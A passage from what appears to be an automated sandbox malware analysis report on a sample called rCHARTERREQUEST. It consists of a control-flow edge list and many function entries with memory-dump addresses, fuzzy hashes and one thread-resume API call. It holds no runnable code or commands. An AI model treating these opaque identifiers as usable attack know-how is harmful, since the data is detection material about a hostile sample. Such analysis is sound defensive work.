6b8de79-6b8de96 2232->2239 2237 6b8df3b 2233->2237 2238 6b8e11d 2233->2238 2236->2219 2247 6b8dd62-6b8dd66 2236->2247 2241 6b8df49-6b8df57 2237->2241 2242 6b8df42-6b8df44 2237->2242 2243 6b8dfa6-6b8dfb4 2237->2243 2238->2183 2259 6b8df1a-6b8df26 2239->2259 2260 6b8de9c-6b8deb2 2239->2260 2244 6b8de2d-6b8de46 2240->2244 2252 6b8df59-6b8df5f 2241->2252 2253 6b8df6f-6b8df72 2241->2253 2242->2183 2254 6b8dfcc-6b8dfcf 2243->2254 2255 6b8dfb6-6b8dfbc 2243->2255 2244->2222 2247->2210 2251 6b8dd6c-6b8dd85 2247->2251 2251->2219 2287 6b8dd87-6b8dd9b 2251->2287 2265 6b8df61 2252->2265 2266 6b8df63-6b8df65 2252->2266 2261 6b8df7b-6b8df89 2253->2261 2262 6b8df74-6b8df76 2253->2262 2263 6b8e060-6b8e071 2254->2263 2264 6b8dfd5-6b8dfe3 2254->2264 2257 6b8dfbe 2255->2257 2258 6b8dfc0-6b8dfc2 2255->2258 2257->2254 2258->2254 2259->2232 2259->2233 2260->2259 2288 6b8deb4-6b8dec2 2260->2288 2274 6b8df8b-6b8df91 2261->2274 2275 6b8dfa1 2261->2275 2262->2183 2272 6b8e089-6b8e08c 2263->2272 2273 6b8e073-6b8e079 2263->2273 2276 6b8dffb-6b8e00e 2264->2276 2277 6b8dfe5-6b8dfeb 2264->2277 2265->2253 2266->2253 2272->2238 2282 6b8e092-6b8e0a3 2272->2282 2279 6b8e07b 2273->2279 2280 6b8e07d-6b8e07f 2273->2280 2283 6b8df93 2274->2283 2284 6b8df95-6b8df97 2274->2284 2275->2183 2291 6b8e010-6b8e016 2276->2291 2292 6b8e026-6b8e033 2276->2292 2285 6b8dfed 2277->2285 2286 6b8dfef-6b8dff1 2277->2286 2279->2272 2280->2272 2295 6b8e0bb-6b8e0cb 2282->2295 2296 6b8e0a5-6b8e0ab 2282->2296 2283->2275 2284->2275 2285->2276 2286->2276 2287->2219 2288->2259 2301 6b8dec4-6b8dec8 2288->2301 2297 6b8e018 2291->2297 2298 6b8e01a-6b8e01c 2291->2298 2292->2263 2304 6b8e035-6b8e043 2292->2304 2307 6b8e0cd-6b8e0d3 2295->2307 2308 6b8e0e3-6b8e0f0 2295->2308 2302 6b8e0ad 2296->2302 2303 6b8e0af-6b8e0b1 2296->2303 2297->2292 2298->2292 2301->2210 2305 6b8dece-6b8def7 2301->2305 2302->2295 2303->2295 2314 6b8e05b 2304->2314 2315 6b8e045-6b8e04b 2304->2315 2305->2259 2322 6b8def9-6b8df17 2305->2322 2309 6b8e0d5 2307->2309 2310 6b8e0d7-6b8e0d9 2307->2310 2308->2238 2316 6b8e0f2-6b8e103 2308->2316 2309->2308 2310->2308 2314->2183 2317 6b8e04d 2315->2317 2318 6b8e04f-6b8e051 2315->2318 2323 6b8e11b 2316->2323 2324 6b8e105-6b8e10b 2316->2324 2317->2314 2318->2314 2322->2259 2323->2183 2325 6b8e10d 2324->2325 2326 6b8e10f-6b8e111 2324->2326 2325->2323 2326->2323
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Pl^q$$^q
                                                                                                          • API String ID: 0-2677662154
                                                                                                          • Opcode ID: 316aefc1a7d9fe1e49365e5e93b222e48ad0ac68720d4706fb0c20f5a9be028b
                                                                                                          • Instruction ID: f9e32cd64eb35ff4fff73e205554e1f495bd387f312c0b5a9fe778f16dbdf53f
                                                                                                          • Opcode Fuzzy Hash: 316aefc1a7d9fe1e49365e5e93b222e48ad0ac68720d4706fb0c20f5a9be028b
                                                                                                          • Instruction Fuzzy Hash: C4222A74B002098FDB94EF29C944A6A77F2FF89701F1598AAE506CB3A5DB31DC42CB51
                                                                                                          Function 01803808 Relevance: 2.7, Strings: 2, Instructions: 228COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q$4'^q
                                                                                                          • API String ID: 0-2697143702
                                                                                                          • Opcode ID: b1e536ac23e78daea5c194075e61af125d4e5cc4757aa4c24ac675e9e588851d
                                                                                                          • Instruction ID: 17ad6cae920d2dcaf3c4a20eb372fd8f722ab5495bb358e5b52806ca22aae0c5
                                                                                                          • Opcode Fuzzy Hash: b1e536ac23e78daea5c194075e61af125d4e5cc4757aa4c24ac675e9e588851d
                                                                                                          • Instruction Fuzzy Hash: 8FA14D70A00209CFD758DF6AE44469EBBF2FBC5308F14D029D415AB368DB395989DB51
                                                                                                          Function 06B8B914 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: OzsR$d%dq
                                                                                                          • API String ID: 0-3731141880
                                                                                                          • Opcode ID: 0f0c26d6599e70c57846ffcefeb03ed3d875af2317abc2d4ace6dcc9a8a9628c
                                                                                                          • Instruction ID: bab1a94631b45c882ea19d599420e74d31d6d7b5ef356b470b1a88e77924b031
                                                                                                          • Opcode Fuzzy Hash: 0f0c26d6599e70c57846ffcefeb03ed3d875af2317abc2d4ace6dcc9a8a9628c
                                                                                                          • Instruction Fuzzy Hash: F4515C74A01219CFE7A4DB69CC54B99B7F2FB89204F1482EAD409EB354DB389E81CF50
                                                                                                          Function 06B8B904 Relevance: 2.6, Strings: 2, Instructions: 120COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: OzsR$d%dq
                                                                                                          • API String ID: 0-3731141880
                                                                                                          • Opcode ID: f37dca4b461f788dc1b80591b2b7d3b587afee09a5a657b709611fb53127dc0f
                                                                                                          • Instruction ID: a17695c950e162214fc461b5c66d356ff612098d5e9b122d0a9ed0ee647914ab
                                                                                                          • Opcode Fuzzy Hash: f37dca4b461f788dc1b80591b2b7d3b587afee09a5a657b709611fb53127dc0f
                                                                                                          • Instruction Fuzzy Hash: DD515A74A01219CFEBA4DB69CC50B9A77F2FB88204F1081A9D409E7344DB389D85CF50
                                                                                                          Function 06D4A4F8 Relevance: 1.9, Strings: 1, Instructions: 612COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: 239f4660fe0d2db22c0cbc2dd11c7ccdfa3c09167b7b65c5e02d769bd452dda0
                                                                                                          • Instruction ID: 1dce6228fca313a29e8af11aebe862c03e8460fdc40eb654906e5feacf1c1426
                                                                                                          • Opcode Fuzzy Hash: 239f4660fe0d2db22c0cbc2dd11c7ccdfa3c09167b7b65c5e02d769bd452dda0
                                                                                                          • Instruction Fuzzy Hash: 6D328A70A006198FCB99DF69C49466EFBF2FF88300F288529D55AD7385DB34AD41CB84
                                                                                                          Function 06D39C58 Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: acdfd4ac69ac637015f46628cabe652149930c844f78fbb706ccf5ea517b1ad6
                                                                                                          • Instruction ID: 1f731f01a34e833d795a77e521feb129ccc55c452fbb81bc005d6662e50b9df0
                                                                                                          • Opcode Fuzzy Hash: acdfd4ac69ac637015f46628cabe652149930c844f78fbb706ccf5ea517b1ad6
                                                                                                          • Instruction Fuzzy Hash: 67021674E05229CFEBA4DF6AD844BA9B7F2FB8A304F1480A9D449A7354D7789D81CF40
                                                                                                          Function 06D39C48 Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 801af5e03d7c505e55f28a6f3ee6fc824c16a56df626e038e33948c25da3e1e2
                                                                                                          • Instruction ID: 773342f0dba4eb9a0e57145ff6fd4718d407f7205619afeda8edc3381d8e358b
                                                                                                          • Opcode Fuzzy Hash: 801af5e03d7c505e55f28a6f3ee6fc824c16a56df626e038e33948c25da3e1e2
                                                                                                          • Instruction Fuzzy Hash: B3021574E01229CFEBA4DF6AD844BA9B7F2FB8A304F1480A9D449A7354DB785D85CF40
                                                                                                          Function 06D80040 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q
                                                                                                          • API String ID: 0-2549759414
                                                                                                          • Opcode ID: 7ea1edd9784abe4597a047407b2ed5915d1f40f4b9712bc435a77a4b0efbe679
                                                                                                          • Instruction ID: f62f3a7df481a4de31ae52908e69c54bcbc4fbe77a60f19e3b759d01be4c6e74
                                                                                                          • Opcode Fuzzy Hash: 7ea1edd9784abe4597a047407b2ed5915d1f40f4b9712bc435a77a4b0efbe679
                                                                                                          • Instruction Fuzzy Hash: 81E1E774E05218CFEBA4EF69D848BADBBF2FB89304F1080A9D449A7355D7349989CF41
                                                                                                          Function 0643BDD8 Relevance: 1.6, APIs: 1, Instructions: 64nativethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • NtResumeThread.NTDLL(?,?), ref: 0643BE4E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: 988c68e86bd7a51420fdba7400b8a4b9e21898c4046ecd4c146aa9de7ab08e29
                                                                                                          • Instruction ID: fe5480b56197ca17a0337c2caab50e333002e61943efd93e6a441473e303160a
                                                                                                          • Opcode Fuzzy Hash: 988c68e86bd7a51420fdba7400b8a4b9e21898c4046ecd4c146aa9de7ab08e29
                                                                                                          • Instruction Fuzzy Hash: 012134B19043588EDB10DFAAC845BEFFBF4EB89320F10842AD559A7211C774A944CFA5
                                                                                                          Function 0643BDE0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • NtResumeThread.NTDLL(?,?), ref: 0643BE4E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: 9f06bd0679b95013a99f85449dd62de59d9ac84c06269b15c6dd347a4de872bb
                                                                                                          • Instruction ID: 3f0862ab7d34f0324d616d314f06d19d7af107cbf9ae7caab76e9125bdf68bcd
                                                                                                          • Opcode Fuzzy Hash: 9f06bd0679b95013a99f85449dd62de59d9ac84c06269b15c6dd347a4de872bb
                                                                                                          • Instruction Fuzzy Hash: 3911D3B1D003598FDB10DFAAC585BAEFBF4EB88324F10842AD559A7250CB74A944CFA5
                                                                                                          Function 06C60C50 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Deq
                                                                                                          • API String ID: 0-948982800
                                                                                                          • Opcode ID: d1c08c37553b702454296085804ac1cad8a3335d7061e03d8bb557e984efcd84
                                                                                                          • Instruction ID: c04fc61bb3b5cf0f26b85ebf57c54ff5baae82cbcd1550fff0f81851d69cb9e8
                                                                                                          • Opcode Fuzzy Hash: d1c08c37553b702454296085804ac1cad8a3335d7061e03d8bb557e984efcd84
                                                                                                          • Instruction Fuzzy Hash: 60D1C374E00218CFDB54DFAAD984A9DBBB2FF89304F1080A9D409AB365DB35AD85CF51
                                                                                                          Function 06D37570 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 4ca342ea272ae973bd054bdc3de3479be5a1618504da7983ad1b01c31d3346ef
                                                                                                          • Instruction ID: ac234b9a84082e90a522bc16ad675d499a15439ba6f833c3f1d34fc51ce1da5a
                                                                                                          • Opcode Fuzzy Hash: 4ca342ea272ae973bd054bdc3de3479be5a1618504da7983ad1b01c31d3346ef
                                                                                                          • Instruction Fuzzy Hash: 78B1F4B4E05628CFDB94DFAAD880BADBBF2FF89304F108169D409A7251DB749985CF44
                                                                                                          Function 06D37560 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 7550135f85842db0a5c8290e06228666935e4a142fb07fa0e4ab5cc0c78c318a
                                                                                                          • Instruction ID: ba896396aaa43e8a2c6270403e982a59523d139c43df9cb5ad002ccb9cbffa0c
                                                                                                          • Opcode Fuzzy Hash: 7550135f85842db0a5c8290e06228666935e4a142fb07fa0e4ab5cc0c78c318a
                                                                                                          • Instruction Fuzzy Hash: 56B1F4B4E01628CFDB94DFAAD884BADBBF2FF89304F108169D409A7251DB749985CF44
                                                                                                          Function 06D378DF Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 0302da7d6e0f2a567e690f95e52a4aa37c094a0765fdc3f32ffd529ed2061487
                                                                                                          • Instruction ID: 87883d7b6a01e710188be41330dd0fd763cab86fce8b90207970f8a9cdf631f0
                                                                                                          • Opcode Fuzzy Hash: 0302da7d6e0f2a567e690f95e52a4aa37c094a0765fdc3f32ffd529ed2061487
                                                                                                          • Instruction Fuzzy Hash: E2A1D2B4E01628CFDB94DFA9D884B9DBBF2FB89304F1081A9D409A7251D7789D85CF44
                                                                                                          Function 06C60C40 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Deq
                                                                                                          • API String ID: 0-948982800
                                                                                                          • Opcode ID: 8ffc55e15818a752cbf4d746f940c1c2390c07cf895aea2997ec3f7cf431d99e
                                                                                                          • Instruction ID: 18efb551df1cf3c723602df74b7f5f72ac9b6ef187496dc502c242d6070ce103
                                                                                                          • Opcode Fuzzy Hash: 8ffc55e15818a752cbf4d746f940c1c2390c07cf895aea2997ec3f7cf431d99e
                                                                                                          • Instruction Fuzzy Hash: 58A1A174E00218CFDB54CF6AD994A9DBBF2BF89304F1081A9E409AB365DB34AD85CF51
                                                                                                          Function 0180B413 Relevance: .5, Instructions: 539COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dd14a17c092b678e6a89d2170e1d60e042c7bdbf465731120c40e783809fbe7f
                                                                                                          • Instruction ID: 31e4546dfb9bd0adf5e7257f5eb1b4e62d29437aa25d6df49b265295d3bf084c
                                                                                                          • Opcode Fuzzy Hash: dd14a17c092b678e6a89d2170e1d60e042c7bdbf465731120c40e783809fbe7f
                                                                                                          • Instruction Fuzzy Hash: F952B4B8A012298FCB65DF28CD84B9ABBB2FB89305F1081D5D50DA7355DB349E81CF51
                                                                                                          Function 06B86D80 Relevance: .3, Instructions: 281COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 03e6fd3e3298d4904b2c1e30070c1068679a263f69b32e0ca6fae775ec4aa0b7
                                                                                                          • Instruction ID: 0afa199d123a470124ad983f59e67ffedeff56fc56adc8fb959cbb64f80c81c0
                                                                                                          • Opcode Fuzzy Hash: 03e6fd3e3298d4904b2c1e30070c1068679a263f69b32e0ca6fae775ec4aa0b7
                                                                                                          • Instruction Fuzzy Hash: 78B1D2B4D46208CFEB40EFAAD8447EDBBB1BB89304F20D0A9D415BB241E7759885CF95
                                                                                                          Function 06B86D72 Relevance: .3, Instructions: 273COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5b85b6a2d4a2a464cbef6f1622372262e61f6db7287dbdbc64e30031307bb645
                                                                                                          • Instruction ID: ab575311245ffffc489807675aeaa54d9df61ddf11e282e8384ff66fc82edf0f
                                                                                                          • Opcode Fuzzy Hash: 5b85b6a2d4a2a464cbef6f1622372262e61f6db7287dbdbc64e30031307bb645
                                                                                                          • Instruction Fuzzy Hash: 77B103B4D46208CFEB40EFAAD8447EDBBF1BB89304F2090A9D415BB241E7759885CF95
                                                                                                          Function 06B83750 Relevance: .3, Instructions: 263COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 393d7f93d3bd61d9d2a09d9f64891dbeec9fd94e97eb62569b75d73083ea04e2
                                                                                                          • Instruction ID: 6503d697f28eb1890f2d726218f19b25d6fb9892fc1abc8d7dd1a5d3fd465131
                                                                                                          • Opcode Fuzzy Hash: 393d7f93d3bd61d9d2a09d9f64891dbeec9fd94e97eb62569b75d73083ea04e2
                                                                                                          • Instruction Fuzzy Hash: 2DA1D2F4D19209CFEF90EFD5D444BAEBBF1AB89704F00A0A9D426A7241C7789985CF81
                                                                                                          Function 06B81D78 Relevance: .2, Instructions: 231COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c20b308d9c967d36e6b1fa068b815620d16d6f32277fc9977acf90db86628988
                                                                                                          • Instruction ID: e3671d0c567bbd189fda47cd5b007541fcdf639f17ed93e7bef99a4346a02b1e
                                                                                                          • Opcode Fuzzy Hash: c20b308d9c967d36e6b1fa068b815620d16d6f32277fc9977acf90db86628988
                                                                                                          • Instruction Fuzzy Hash: C5A14AB4A01219CFEB94EF69D444BADB7F2FB89304F1080A9D40AA7390DB345E45CF90
                                                                                                          Function 06DAECF0 Relevance: .2, Instructions: 211COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934843193.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6da0000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0234b64ae0b2b48003d56f48f622989fa946680032ec535e2e4b2bceac7d0cae
                                                                                                          • Instruction ID: 5d30909d576204887996e13d3bda4ef04ef83695b2952f4817c06bd7f81b977e
                                                                                                          • Opcode Fuzzy Hash: 0234b64ae0b2b48003d56f48f622989fa946680032ec535e2e4b2bceac7d0cae
                                                                                                          • Instruction Fuzzy Hash: B3910974E09358CFEB54CFAAC9447DDBBF2BB89300F1080A9D489AB255D7749A84DF41
                                                                                                          Function 06B81EF0 Relevance: .2, Instructions: 183COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8bf39662cc230a14faaf0e2fbd2a8b552979bfe4e22799304e12a55baaaae20d
                                                                                                          • Instruction ID: ef6eb5839fc1ec50b924b60ef86db87fbad93d7bf62de172c5ccb19088abe886
                                                                                                          • Opcode Fuzzy Hash: 8bf39662cc230a14faaf0e2fbd2a8b552979bfe4e22799304e12a55baaaae20d
                                                                                                          • Instruction Fuzzy Hash: 898108B4A01219CFDB94EF69E544BADB7F1FB99304F1040A9E50AEB394DB385E41CB90
                                                                                                          Function 06B81D69 Relevance: .2, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5d11ce55f9aadf7a768e36890b5359a2063e0b6f8dfedfe4b4457aa1a2beea06
                                                                                                          • Instruction ID: 41d99a28b44f68ca92f191bb5f149221c3ab3ed5a356ae7228fcfcbadb2d0899
                                                                                                          • Opcode Fuzzy Hash: 5d11ce55f9aadf7a768e36890b5359a2063e0b6f8dfedfe4b4457aa1a2beea06
                                                                                                          • Instruction Fuzzy Hash: 13714BB4A01219CFEB94DF69D944BADB7F1FB89304F1080AAE40AA7391DB345E45CB90
                                                                                                          Function 06437618 Relevance: .2, Instructions: 177COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e8823072256a7811b1495fd47e989db7be48ef285282acd45f6d5804f101855b
                                                                                                          • Instruction ID: 706ac1eb7785988ce72b3ddcf7a80e564d77bbd6cecf114ffa913e905a3b2844
                                                                                                          • Opcode Fuzzy Hash: e8823072256a7811b1495fd47e989db7be48ef285282acd45f6d5804f101855b
                                                                                                          • Instruction Fuzzy Hash: 647104B0D01229CFEBA4CF6AC844BEEBBF1FB89314F10A0AAC459A7251D7745985CF44
                                                                                                          Function 06B81E30 Relevance: .2, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 442f74529e57ad2031fccd248fbefb7d7d5fbcea99859f88e50ed00eabb5f523
                                                                                                          • Instruction ID: aadfef118396f14b8274ea3ce07a689817ecbb115f2fb678e859f094e1f5db24
                                                                                                          • Opcode Fuzzy Hash: 442f74529e57ad2031fccd248fbefb7d7d5fbcea99859f88e50ed00eabb5f523
                                                                                                          • Instruction Fuzzy Hash: C97107B4A01219CFEB94DF69E544BADB7F1FB99304F1040A9E50AA7380DB385E41CB90
